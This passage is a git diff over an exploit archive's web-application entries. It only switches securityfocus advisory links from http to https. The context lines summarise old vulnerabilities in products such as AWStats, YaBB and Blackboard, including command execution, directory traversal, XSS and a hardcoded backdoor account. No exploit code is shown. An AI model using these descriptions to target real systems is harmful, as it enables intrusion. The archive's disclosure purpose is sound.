arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly validate user-supplied URI input. diff --git a/exploits/cgi/webapps/23913.txt b/exploits/cgi/webapps/23913.txt index 432347898..bf8bfb9d8 100644 --- a/exploits/cgi/webapps/23913.txt +++ b/exploits/cgi/webapps/23913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10058/info +source: https://www.securityfocus.com/bid/10058/info It has been reported that FTGate is prone to multiple remote input validation vulnerabilities; a cross-site scripting issue and an HTML injection vulnerability. These issues are due to a failure of the application to properly sanitize user supplied input before using it in dynamic web content. diff --git a/exploits/cgi/webapps/23914.txt b/exploits/cgi/webapps/23914.txt index 4c49ec451..f0800f51c 100644 --- a/exploits/cgi/webapps/23914.txt +++ b/exploits/cgi/webapps/23914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10059/info +source: https://www.securityfocus.com/bid/10059/info It has been reported that FTGate it prone to a server path disclosure vulnerability. This issue is due to an ill conceived error message that includes the server path. diff --git a/exploits/cgi/webapps/23937.txt b/exploits/cgi/webapps/23937.txt index 730c0fbb1..837cb6fa7 100644 --- a/exploits/cgi/webapps/23937.txt +++ b/exploits/cgi/webapps/23937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23938.txt b/exploits/cgi/webapps/23938.txt index 55f4f5689..4f029f596 100644 --- a/exploits/cgi/webapps/23938.txt +++ b/exploits/cgi/webapps/23938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23939.txt b/exploits/cgi/webapps/23939.txt index 79aa15d16..5b1a9f2ce 100644 --- a/exploits/cgi/webapps/23939.txt +++ b/exploits/cgi/webapps/23939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23940.txt b/exploits/cgi/webapps/23940.txt index 064540276..1de93c173 100644 --- a/exploits/cgi/webapps/23940.txt +++ b/exploits/cgi/webapps/23940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23941.txt b/exploits/cgi/webapps/23941.txt index 6d1a558d3..4fb63f20a 100644 --- a/exploits/cgi/webapps/23941.txt +++ b/exploits/cgi/webapps/23941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23942.txt b/exploits/cgi/webapps/23942.txt index fb5e1fca3..340815ca7 100644 --- a/exploits/cgi/webapps/23942.txt +++ b/exploits/cgi/webapps/23942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10089/info +source: https://www.securityfocus.com/bid/10089/info Multiple vulnerabilities have been identified in the application that may allow a remote attacker to carry out directory traversal and cross-site scripting attacks. diff --git a/exploits/cgi/webapps/23986.txt b/exploits/cgi/webapps/23986.txt index 526e5c747..347a8c009 100644 --- a/exploits/cgi/webapps/23986.txt +++ b/exploits/cgi/webapps/23986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10101/info +source: https://www.securityfocus.com/bid/10101/info Blackboard Learning System has been reported prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly validate user supplied URI input. diff --git a/exploits/cgi/webapps/24001.txt b/exploits/cgi/webapps/24001.txt index 3b52b840b..3d80b01c0 100644 --- a/exploits/cgi/webapps/24001.txt +++ b/exploits/cgi/webapps/24001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10139/info +source: https://www.securityfocus.com/bid/10139/info It has been reported that Zaep AntiSpam is prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input. diff --git a/exploits/cgi/webapps/24094.txt b/exploits/cgi/webapps/24094.txt index 24f90c3d1..e213400c1 100644 --- a/exploits/cgi/webapps/24094.txt +++ b/exploits/cgi/webapps/24094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10294/info +source: https://www.securityfocus.com/bid/10294/info SurgeLDAP is an LDAP server implementation for Microsoft Windows and various Unix operating systems. It includes a built-in web server to permit remote user access via HTTP. diff --git a/exploits/cgi/webapps/24122.txt b/exploits/cgi/webapps/24122.txt index 4ef6b0106..effd9c824 100644 --- a/exploits/cgi/webapps/24122.txt +++ b/exploits/cgi/webapps/24122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10359/info +source: https://www.securityfocus.com/bid/10359/info It has been reported that TurboTrafficTrader C does not properly sanitize input received from users. It has been conjectured that this may allow a remote user to launch cross-site scripting and HTML injection attacks. diff --git a/exploits/cgi/webapps/24164.txt b/exploits/cgi/webapps/24164.txt index 92d722ee5..0815cb789 100644 --- a/exploits/cgi/webapps/24164.txt +++ b/exploits/cgi/webapps/24164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10445/info +source: https://www.securityfocus.com/bid/10445/info TinyWeb Server is affected by an unauthorized script disclosure vulnerability. This issue is due to an input validation error that allows malicious users to bypass standard web server rules. diff --git a/exploits/cgi/webapps/24175.txt b/exploits/cgi/webapps/24175.txt index cf9af806a..63cfc943b 100644 --- a/exploits/cgi/webapps/24175.txt +++ b/exploits/cgi/webapps/24175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10476/info +source: https://www.securityfocus.com/bid/10476/info It is reported that Linksys Web Camera software is prone to a remote file disclosure vulnerability that may allow a remote attacker to disclose sensitive files. diff --git a/exploits/cgi/webapps/24188.pl b/exploits/cgi/webapps/24188.pl index 85d15646d..a8bd4b1cc 100755 --- a/exploits/cgi/webapps/24188.pl +++ b/exploits/cgi/webapps/24188.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10515/info +source: https://www.securityfocus.com/bid/10515/info It is reported that Blackboard improperly allows users to download files posted in the 'Digital Dropbox'. Files in the dropbox are intended for the course administrators. diff --git a/exploits/cgi/webapps/24197.txt b/exploits/cgi/webapps/24197.txt index d0f6953db..43946bf08 100644 --- a/exploits/cgi/webapps/24197.txt +++ b/exploits/cgi/webapps/24197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10533/info +source: https://www.securityfocus.com/bid/10533/info It is reported that Linksys Web Camera software is prone to a cross-site scripting vulnerability that may allow a remote attacker to steal cookie-based authentication credentials or carry out other attacks. diff --git a/exploits/cgi/webapps/24236.txt b/exploits/cgi/webapps/24236.txt index 5abd9be97..62f345569 100644 --- a/exploits/cgi/webapps/24236.txt +++ b/exploits/cgi/webapps/24236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10617/info +source: https://www.securityfocus.com/bid/10617/info Cart32 is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/cgi/webapps/24237.txt b/exploits/cgi/webapps/24237.txt index 7803ebf2f..128f2e9fe 100644 --- a/exploits/cgi/webapps/24237.txt +++ b/exploits/cgi/webapps/24237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10618/info +source: https://www.securityfocus.com/bid/10618/info A vulnerability has been identified in the application that may allow an attacker to disclose the installation path. diff --git a/exploits/cgi/webapps/24244.txt b/exploits/cgi/webapps/24244.txt index 36c4ead23..e590dabb7 100644 --- a/exploits/cgi/webapps/24244.txt +++ b/exploits/cgi/webapps/24244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10645/info +source: https://www.securityfocus.com/bid/10645/info Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform to manage and maintain users and user accounts. The tool supports a web based interface for creating and removing users in multi-user environments. diff --git a/exploits/cgi/webapps/24245.txt b/exploits/cgi/webapps/24245.txt index 4b00ec3e2..5aef72528 100644 --- a/exploits/cgi/webapps/24245.txt +++ b/exploits/cgi/webapps/24245.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10645/info +source: https://www.securityfocus.com/bid/10645/info Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform to manage and maintain users and user accounts. The tool supports a web based interface for creating and removing users in multi-user environments. diff --git a/exploits/cgi/webapps/24251.txt b/exploits/cgi/webapps/24251.txt index 2b9cd246d..3e1b24fd4 100644 --- a/exploits/cgi/webapps/24251.txt +++ b/exploits/cgi/webapps/24251.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10657/info +source: https://www.securityfocus.com/bid/10657/info Symantec Brightmail anti-spam is reported prone to an unauthorized message disclosure vulnerability. diff --git a/exploits/cgi/webapps/24252.txt b/exploits/cgi/webapps/24252.txt index 6191b45bf..7ec29cd37 100644 --- a/exploits/cgi/webapps/24252.txt +++ b/exploits/cgi/webapps/24252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10658/info +source: https://www.securityfocus.com/bid/10658/info The NetFile FTP/Web Server is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data. This can allow an attacker to create, view, and delete arbitrary files outside the web root. diff --git a/exploits/cgi/webapps/24254.txt b/exploits/cgi/webapps/24254.txt index 01079c7bd..faaca1b2a 100644 --- a/exploits/cgi/webapps/24254.txt +++ b/exploits/cgi/webapps/24254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10662/info +source: https://www.securityfocus.com/bid/10662/info BasiliX Webmail is reported to be prone to an email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings. diff --git a/exploits/cgi/webapps/24284.txt b/exploits/cgi/webapps/24284.txt index 341ace498..48615329f 100644 --- a/exploits/cgi/webapps/24284.txt +++ b/exploits/cgi/webapps/24284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10729/info +source: https://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. diff --git a/exploits/cgi/webapps/24285.txt b/exploits/cgi/webapps/24285.txt index 2ee8b9747..c9303c6d1 100644 --- a/exploits/cgi/webapps/24285.txt +++ b/exploits/cgi/webapps/24285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10729/info +source: https://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. diff --git a/exploits/cgi/webapps/24286.txt b/exploits/cgi/webapps/24286.txt index ca9c70243..fdcbc89a5 100644 --- a/exploits/cgi/webapps/24286.txt +++ b/exploits/cgi/webapps/24286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10731/info +source: https://www.securityfocus.com/bid/10731/info Gattaca Server 2003 is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/cgi/webapps/24287.txt b/exploits/cgi/webapps/24287.txt index 194f87e99..6e61063cf 100644 --- a/exploits/cgi/webapps/24287.txt +++ b/exploits/cgi/webapps/24287.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10734/info +source: https://www.securityfocus.com/bid/10734/info BoardPower Forum is reportedly affected by a cross-site scripting vulnerability in the icq.cgi script. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/cgi/webapps/24347.txt b/exploits/cgi/webapps/24347.txt index fc8562e7f..ed9e5c88c 100644 --- a/exploits/cgi/webapps/24347.txt +++ b/exploits/cgi/webapps/24347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10853/info +source: https://www.securityfocus.com/bid/10853/info Pete Stein GoScript is prone to a remote command execution vulnerability. diff --git a/exploits/cgi/webapps/24400.txt b/exploits/cgi/webapps/24400.txt index bebe95ae3..dc8a7bf25 100644 --- a/exploits/cgi/webapps/24400.txt +++ b/exploits/cgi/webapps/24400.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11011/info +source: https://www.securityfocus.com/bid/11011/info 1. A shell metacharacter command-execution vulnerability allows an anonymous user to download the contents of the '/etc/passwd' file on the device. Other commands are also likely to work, facilitating other attacks. diff --git a/exploits/cgi/webapps/24401.txt b/exploits/cgi/webapps/24401.txt index cccdd3cdc..d3a1899c2 100644 --- a/exploits/cgi/webapps/24401.txt +++ b/exploits/cgi/webapps/24401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11011/info +source: https://www.securityfocus.com/bid/11011/info A directory-traversal vulnerability in HTTP POST requests. This attack is demonstrated by an anonymous user calling protected administration scripts. This bypasses authentication checks and gives anonymous users remote adminitration of the devices. diff --git a/exploits/cgi/webapps/24402.php b/exploits/cgi/webapps/24402.php index e724953f4..eafbed31f 100644 --- a/exploits/cgi/webapps/24402.php +++ b/exploits/cgi/webapps/24402.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11011/info +source: https://www.securityfocus.com/bid/11011/info A hardcoded backdoor administrative-user issue allows remote attackers to administer affected devices. This likely cannot be disabled. diff --git a/exploits/cgi/webapps/24408.txt b/exploits/cgi/webapps/24408.txt index 80ddac891..3040a9cdd 100644 --- a/exploits/cgi/webapps/24408.txt +++ b/exploits/cgi/webapps/24408.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11028/info +source: https://www.securityfocus.com/bid/11028/info WebAPP is reported prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input data. diff --git a/exploits/cgi/webapps/24574.txt b/exploits/cgi/webapps/24574.txt index affeb8d1a..b831fc331 100644 --- a/exploits/cgi/webapps/24574.txt +++ b/exploits/cgi/webapps/24574.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11122/info +source: https://www.securityfocus.com/bid/11122/info Webmin / Usermin are reportedly affected by a command execution vulnerability when rendering HTML email messages. This issue is due to a failure to sanitize HTML email messages and may allow an attacker to execute arbitrary commands on a vulnerable computer. diff --git a/exploits/cgi/webapps/24576.txt b/exploits/cgi/webapps/24576.txt index 1ce9e62e1..d199d95a7 100644 --- a/exploits/cgi/webapps/24576.txt +++ b/exploits/cgi/webapps/24576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11126/info +source: https://www.securityfocus.com/bid/11126/info Reportedly UtilMind Solutions Site News is affected by an authentication bypass vulnerability. This issue is due to an access validation error. diff --git a/exploits/cgi/webapps/24591.txt b/exploits/cgi/webapps/24591.txt index 62123a48d..232b2ac4d 100644 --- a/exploits/cgi/webapps/24591.txt +++ b/exploits/cgi/webapps/24591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11160/info +source: https://www.securityfocus.com/bid/11160/info It is reported that PerlDesk is susceptible to a server-side script execution vulnerability. diff --git a/exploits/cgi/webapps/24611.txt b/exploits/cgi/webapps/24611.txt index 63aa72c3c..558a827b9 100644 --- a/exploits/cgi/webapps/24611.txt +++ b/exploits/cgi/webapps/24611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11214/info +source: https://www.securityfocus.com/bid/11214/info It is reported that YaBB is affected by an administrator command execution vulnerability. This issue is due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/cgi/webapps/24612.txt b/exploits/cgi/webapps/24612.txt index 4143a3cfe..2a6de5504 100644 --- a/exploits/cgi/webapps/24612.txt +++ b/exploits/cgi/webapps/24612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11215/info +source: https://www.securityfocus.com/bid/11215/info A cross-site scripting vulnerability is reported in the YaBB forum 'YaBB.pl' script. diff --git a/exploits/cgi/webapps/24700.txt b/exploits/cgi/webapps/24700.txt index a64e962bc..d823433a3 100644 --- a/exploits/cgi/webapps/24700.txt +++ b/exploits/cgi/webapps/24700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11504/info +source: https://www.securityfocus.com/bid/11504/info Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information. diff --git a/exploits/cgi/webapps/24703.txt b/exploits/cgi/webapps/24703.txt index 94fdf99bb..e2ff16344 100644 --- a/exploits/cgi/webapps/24703.txt +++ b/exploits/cgi/webapps/24703.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11517/info +source: https://www.securityfocus.com/bid/11517/info It is reported that LinuxStat is vulnerable to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/24721.txt b/exploits/cgi/webapps/24721.txt index 2198c597a..80e247182 100644 --- a/exploits/cgi/webapps/24721.txt +++ b/exploits/cgi/webapps/24721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11596/info +source: https://www.securityfocus.com/bid/11596/info MailPost is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data and can allow an attacker to execute arbitrary HTML and script code in a user's browser. diff --git a/exploits/cgi/webapps/24722.txt b/exploits/cgi/webapps/24722.txt index 6c7c7bc4b..640e2fc8d 100644 --- a/exploits/cgi/webapps/24722.txt +++ b/exploits/cgi/webapps/24722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11598/info +source: https://www.securityfocus.com/bid/11598/info MailPost is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data and can allow an attacker to execute arbitrary HTML and script code in a user's browser through a malicious error message returned from the application. diff --git a/exploits/cgi/webapps/24723.txt b/exploits/cgi/webapps/24723.txt index cd783bd23..df0016ca5 100644 --- a/exploits/cgi/webapps/24723.txt +++ b/exploits/cgi/webapps/24723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11599/info +source: https://www.securityfocus.com/bid/11599/info TIPS MailPost is affected by a remote file enumeration vulnerability. This issue is due to a failure to properly sanitize user requests. diff --git a/exploits/cgi/webapps/24779.txt b/exploits/cgi/webapps/24779.txt index df506740a..104816889 100644 --- a/exploits/cgi/webapps/24779.txt +++ b/exploits/cgi/webapps/24779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11758/info +source: https://www.securityfocus.com/bid/11758/info InMail and InShop are both reported susceptible to cross-site scripting vulnerabilities. These issues are due to a failure of the applications to properly sanitize user-supplied input prior to including it in dynamic Web pages. diff --git a/exploits/cgi/webapps/24836.txt b/exploits/cgi/webapps/24836.txt index 81a90cc7a..3bb498b9a 100644 --- a/exploits/cgi/webapps/24836.txt +++ b/exploits/cgi/webapps/24836.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11924/info +source: https://www.securityfocus.com/bid/11924/info It is reported that UseModWiki is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input before outputting it in Web Pages. diff --git a/exploits/cgi/webapps/24986.txt b/exploits/cgi/webapps/24986.txt index f281faf26..5ca0b85cc 100644 --- a/exploits/cgi/webapps/24986.txt +++ b/exploits/cgi/webapps/24986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11982/info +source: https://www.securityfocus.com/bid/11982/info Multiple remote SQL injection vulnerabilities reportedly affect Ikonboard. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/cgi/webapps/25041.txt b/exploits/cgi/webapps/25041.txt index a49554bdc..a444c3e9f 100644 --- a/exploits/cgi/webapps/25041.txt +++ b/exploits/cgi/webapps/25041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12048/info +source: https://www.securityfocus.com/bid/12048/info It is reported that e_Board is vulnerable to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25042.txt b/exploits/cgi/webapps/25042.txt index 655d2b708..c42978ca4 100644 --- a/exploits/cgi/webapps/25042.txt +++ b/exploits/cgi/webapps/25042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12050/info +source: https://www.securityfocus.com/bid/12050/info Tlen.pl is reported prone to a potential script execution vulnerability. It is reported that this issue may allow remote attackers to execute arbitrary script code on a vulnerable computer, which may lead to various attacks. diff --git a/exploits/cgi/webapps/25051.txt b/exploits/cgi/webapps/25051.txt index a278b8fae..53d554953 100644 --- a/exploits/cgi/webapps/25051.txt +++ b/exploits/cgi/webapps/25051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12097/info +source: https://www.securityfocus.com/bid/12097/info WPKontakt is reported prone to a potential script execution vulnerability. It is reported that this issue may allow remote attackers to execute arbitrary script code on a vulnerable computer, which may lead to various attacks. Arbitrary script code may be executed on a target system in the event that a specially message containing a specially malformed email address containing a JavaScript URI is received. diff --git a/exploits/cgi/webapps/25067.txt b/exploits/cgi/webapps/25067.txt index 557d4047d..27c992c8d 100644 --- a/exploits/cgi/webapps/25067.txt +++ b/exploits/cgi/webapps/25067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12395/info +source: https://www.securityfocus.com/bid/12395/info Alt-n WebAdmin is reportedly affected by multiple remote vulnerabilities. diff --git a/exploits/cgi/webapps/25096.txt b/exploits/cgi/webapps/25096.txt index 14eb30a62..380ebc455 100644 --- a/exploits/cgi/webapps/25096.txt +++ b/exploits/cgi/webapps/25096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12545/info +source: https://www.securityfocus.com/bid/12545/info A remote information disclosure vulnerability reportedly affects AWStats. This issue is due to a failure of the application to properly validate access to sensitive data. diff --git a/exploits/cgi/webapps/25108.txt b/exploits/cgi/webapps/25108.txt index b57bfd2b8..b2a3ffa30 100644 --- a/exploits/cgi/webapps/25108.txt +++ b/exploits/cgi/webapps/25108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12572/info +source: https://www.securityfocus.com/bid/12572/info AWStats is reported prone to a remote arbitrary command-execution vulnerability. This issue occurs because the application fails to properly sanitize user-supplied data. diff --git a/exploits/cgi/webapps/25147.txt b/exploits/cgi/webapps/25147.txt index 240e048eb..6c3081fda 100644 --- a/exploits/cgi/webapps/25147.txt +++ b/exploits/cgi/webapps/25147.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12620/info +source: https://www.securityfocus.com/bid/12620/info Biz Mail Form is prone to a vulnerability that allows the application to be abused as a mail relay. diff --git a/exploits/cgi/webapps/25201.txt b/exploits/cgi/webapps/25201.txt index aeebabe35..d86862868 100644 --- a/exploits/cgi/webapps/25201.txt +++ b/exploits/cgi/webapps/25201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12761/info +source: https://www.securityfocus.com/bid/12761/info NewsScript is reported prone to an access validation vulnerability. This issue may allow an unauthorized attacker to add, modify and delete messages. diff --git a/exploits/cgi/webapps/25331.txt b/exploits/cgi/webapps/25331.txt index 4cbf3990c..78e24bc16 100644 --- a/exploits/cgi/webapps/25331.txt +++ b/exploits/cgi/webapps/25331.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12984/info +source: https://www.securityfocus.com/bid/12984/info Multiple remote input validation vulnerabilities affect SonicWALL SOHO. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/cgi/webapps/25350.txt b/exploits/cgi/webapps/25350.txt index 57b88e053..7a0cde2e1 100644 --- a/exploits/cgi/webapps/25350.txt +++ b/exploits/cgi/webapps/25350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13037/info +source: https://www.securityfocus.com/bid/13037/info It is reported that the WebWasher 'conf' script is prone to a cross-site scripting vulnerability. diff --git a/exploits/cgi/webapps/25592.txt b/exploits/cgi/webapps/25592.txt index 75c0100e8..6d4ce96f5 100644 --- a/exploits/cgi/webapps/25592.txt +++ b/exploits/cgi/webapps/25592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13482/info +source: https://www.securityfocus.com/bid/13482/info WebCrossing is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25594.txt b/exploits/cgi/webapps/25594.txt index 8d7331ff1..2f0e23c46 100644 --- a/exploits/cgi/webapps/25594.txt +++ b/exploits/cgi/webapps/25594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13484/info +source: https://www.securityfocus.com/bid/13484/info Gossamer Threads Links is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25622.txt b/exploits/cgi/webapps/25622.txt index d02a46d9e..1e5aa5c5a 100644 --- a/exploits/cgi/webapps/25622.txt +++ b/exploits/cgi/webapps/25622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13522/info +source: https://www.securityfocus.com/bid/13522/info MegaBook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25632.txt b/exploits/cgi/webapps/25632.txt index e45b57954..5490622ea 100644 --- a/exploits/cgi/webapps/25632.txt +++ b/exploits/cgi/webapps/25632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13551/info +source: https://www.securityfocus.com/bid/13551/info Easy Message Board is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. diff --git a/exploits/cgi/webapps/25634.txt b/exploits/cgi/webapps/25634.txt index d7149f089..d07fc2692 100644 --- a/exploits/cgi/webapps/25634.txt +++ b/exploits/cgi/webapps/25634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13555/info +source: https://www.securityfocus.com/bid/13555/info Easy Message Board is prone to a remote command execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25649.txt b/exploits/cgi/webapps/25649.txt index 6a4d892d4..2195e1d31 100644 --- a/exploits/cgi/webapps/25649.txt +++ b/exploits/cgi/webapps/25649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13598/info +source: https://www.securityfocus.com/bid/13598/info ShowOff! Digital Media Software is affected by multiple vulnerabilities. These issues can allow an attacker to carry out directory traversal and denial of service attacks. diff --git a/exploits/cgi/webapps/25666.txt b/exploits/cgi/webapps/25666.txt index f7377439d..e31cfc458 100644 --- a/exploits/cgi/webapps/25666.txt +++ b/exploits/cgi/webapps/25666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13638/info +source: https://www.securityfocus.com/bid/13638/info pServ is affected by a remote source code disclosure vulnerability. diff --git a/exploits/cgi/webapps/25668.txt b/exploits/cgi/webapps/25668.txt index 47e9ee42b..3f63e1e4c 100644 --- a/exploits/cgi/webapps/25668.txt +++ b/exploits/cgi/webapps/25668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13640/info +source: https://www.securityfocus.com/bid/13640/info Sigma ISP Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to using it in an SQL query. diff --git a/exploits/cgi/webapps/25817.txt b/exploits/cgi/webapps/25817.txt index a069f45dc..02add3bce 100644 --- a/exploits/cgi/webapps/25817.txt +++ b/exploits/cgi/webapps/25817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13937/info +source: https://www.securityfocus.com/bid/13937/info JamMail is prone to a remote arbitrary command execution vulnerability. diff --git a/exploits/cgi/webapps/25918.txt b/exploits/cgi/webapps/25918.txt index d7f1581c1..a496a23a0 100644 --- a/exploits/cgi/webapps/25918.txt +++ b/exploits/cgi/webapps/25918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14091/info +source: https://www.securityfocus.com/bid/14091/info imTRBBS is affected by a remote command execution vulnerability. diff --git a/exploits/cgi/webapps/25920.pl b/exploits/cgi/webapps/25920.pl index 55a23f5c6..d0ac33d6f 100755 --- a/exploits/cgi/webapps/25920.pl +++ b/exploits/cgi/webapps/25920.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14097/info +source: https://www.securityfocus.com/bid/14097/info Community Link Pro is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/cgi/webapps/25939.txt b/exploits/cgi/webapps/25939.txt index 27cba5902..3d1c504cf 100644 --- a/exploits/cgi/webapps/25939.txt +++ b/exploits/cgi/webapps/25939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14148/info +source: https://www.securityfocus.com/bid/14148/info GlobalNoteScript is prone to a remote arbitrary command execution vulnerability. diff --git a/exploits/cgi/webapps/25950.pl b/exploits/cgi/webapps/25950.pl index 64daee011..6c7cfbf1e 100755 --- a/exploits/cgi/webapps/25950.pl +++ b/exploits/cgi/webapps/25950.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14176/info +source: https://www.securityfocus.com/bid/14176/info The eRoom plug-in is prone to an insecure file download handling vulnerability. diff --git a/exploits/cgi/webapps/25952.txt b/exploits/cgi/webapps/25952.txt index a33076644..5149fb3cf 100644 --- a/exploits/cgi/webapps/25952.txt +++ b/exploits/cgi/webapps/25952.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14182/info +source: https://www.securityfocus.com/bid/14182/info 